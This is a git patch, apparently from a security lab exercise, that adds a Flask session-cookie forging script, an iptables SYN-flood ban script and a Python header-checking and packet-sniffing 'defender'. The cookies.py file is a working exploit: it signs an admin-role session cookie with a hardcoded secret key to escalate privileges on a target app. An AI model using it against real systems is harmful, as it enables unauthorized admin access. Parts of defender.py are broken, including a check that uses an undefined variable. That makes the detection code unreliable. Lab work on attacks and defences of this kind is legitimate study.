From a7f586df5abf34774d84f76b6913ca287e4cb9e7 Mon Sep 17 00:00:00 2001 From: Nour Alhouseini Date: Tue, 26 Apr 2022 12:12:02 +0100 Subject: [PATCH] Push files to Github --- cookies.py | 100 ++++++++++++++++++++++++++++++++++++++++++++++++++++ defend.sh | 28 +++++++++++++++ defender.py | 90 ++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 218 insertions(+) create mode 100755 cookies.py create mode 100755 defend.sh create mode 100644 defender.py diff --git a/cookies.py b/cookies.py new file mode 100755 index 0000000..63abdb4 --- /dev/null +++ b/cookies.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python + +import requests +import sys +import zlib +from itsdangerous import base64_decode +import ast +from flask.sessions import SecureCookieSessionInterface + + +wanted_cookie = '{"role": "admin" , "user" : "3"}' # Data that we want to sign + +url = "http://172.18.0.2:5000" + +s = requests.Session() # To keep track of the session's cookie + + +class MockApp(object): + + def __init__(self, secret_key): + self.secret_key = secret_key + + +def login(user,password) : + ''' + @ user -> the username + @ password -> the passowrd + ''' + data = {'email': user ,'password' : password } + + + + + print ("User : {0}".format(user)) + print ("Password : {0}".format(password)) + send = s.post( url + "/login" ,data = data ) #post to the login page the provided data + + + + #print(encode("secret",cookie_cracked)) + + if "No Such User" in send.text : + print("STATUS : Failed Login") + print(s) + + print('----------------------') + else : + print("STATUS : LOGGED IN ") + print("Cookie : {0}".format(s.cookies['session'])) #if the user is logged in print his cookie + print('----------------------') + return s.cookies['session'] + +def logout (): + s.get(url + "/logout") +def encode(secret_key, session_cookie_structure): + """ Encode a Flask session cookie """ + try: + app = MockApp(secret_key) + + session_cookie_structure = dict(ast.literal_eval(session_cookie_structure)) # Dividing the cookie into three parts to be read + si = SecureCookieSessionInterface() + s = si.get_signing_serializer(app) + + return s.dumps(session_cookie_structure) + except Exception as e: + return "[Encoding error] {}".format(e) + raise e +def decode(session_cookie_value, secret_key=None): + """ Decode a Flask cookie """ + try: + if(secret_key==None): + compressed = False + payload = session_cookie_value + + if payload.startswith('.'): + compressed = True + payload = payload[1:] + + data = payload.split(".")[0] # The first section is the session data + + data = base64_decode(data) + if compressed: + data = zlib.decompress(data) + + return data + else: + app = MockApp(secret_key) + + si = SecureCookieSessionInterface() + s = si.get_signing_serializer(app) + + return s.loads(session_cookie_value) + except Exception as e: + return "[Decoding error] {}".format(e) + raise e +if __name__ == "__main__" : + print("Connecting to {0} ...... ".format(url)) + print(encode("Sup3r_SeKret_T0ken" , wanted_cookie)) + #print("LOGGING OUT ") + logout() \ No newline at end of file diff --git a/defend.sh b/defend.sh new file mode 100755 index 0000000..2d5d110 --- /dev/null +++ b/defend.sh @@ -0,0 +1,28 @@ +# Description : SYN Flood Prevention using iptables against Scapy SYN packets generated +> /var/log/DDOS_IP.log +> /tmp/test1.txt +> /tmp/test2.txt +trap "echo ;echo Caught EXIT signal;iptables -F;echo Iptables entries cleared;echo HaX0R SVP" EXIT +while true; +do +date >> /var/log/DDOS_IP.log +netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | sort | uniq -c >> /var/log/DDOS_IP.log +for pip in `netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | sort | uniq` +do +conntrack=`netstat | grep -E "ssh|www" | grep -iv ESTABLISHED | awk '{print $5}' | cut -d : -f 1 | grep $pip | wc -l`; +while read line +do +if [ "$line" = "$pip" ] +then +continue 2 +fi +done < /tmp/test2.txt +if [ "$conntrack" -gt "25" ] +then +iptables -I INPUT -s $pip -p tcp -j REJECT --reject-with tcp-reset +echo "$pip" >> /tmp/test1.txt +fi +done +cat /tmp/test1.txt | sort | uniq > /tmp/test2.txt +sleep $1 +done \ No newline at end of file diff --git a/defender.py b/defender.py new file mode 100644 index 0000000..8204dd5 --- /dev/null +++ b/defender.py @@ -0,0 +1,90 @@ +from scapy.all import * + +import requests + +import netifaces as ni +import getpass + +import telnetlib + + + + + +def check_pragma_attack(request): + pragma_count = 0 + value = request.headers + if ('PRAGMA' not in value): + print("PRAGMA header not detected") + return False + else: + print("PRAGMA header detected") + pragma_count += pragma_count + pragma_value = request.headers["PRAGMA"] + if (int(content_length) <= 2000000): + + + print("WARNING !") + return True + else: + return False + + + + + +def check_availability(url): + + response = requests.get(url) + if (response.status_code != 503): + print("{0}: Available".format(url)) + print("Resuming .../") + return True +def check_http_post_attack(request): + value = request.headers + if ('Content-Length' not in value): + return True + else: + content_length = request.headers["Content-Length"] + if (int(content_length) <= 2000000): + + print("Content length is fine") + print("Resuming .../") + return True + else: + return False + + +if __name__ == "__main__": + ip = ni.ifaddresses('br-abfe242530cd')[ni.AF_INET][0]['addr'] + + url = "http://{0}:5000".format(ip) + HOST = "localhost" + user = "USER" + #password = getpass.getpass() + + #tn = telnetlib.Telnet(HOST) + + #tn.read_until(b"login: ") + #tn.write(user.encode('ascii') + b"\n") + #if password: + # tn.read_until(b"Password: ") + # tn.write(password.encode('ascii') + b"\n") + + #tn.write(b"ls\n") + #tn.write(b"exit\n") + + #print(tn.read_all().decode('ascii')) + response = requests.get(url) + check_availability(url) + check_http_post_attack(response) + check_pragma_attack(response) + pkts = sniff(iface="br-abfe242530cd",prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{IP:%IP.ttl%\n}{Raw:%Raw.load%\n}")) + + + + + + + +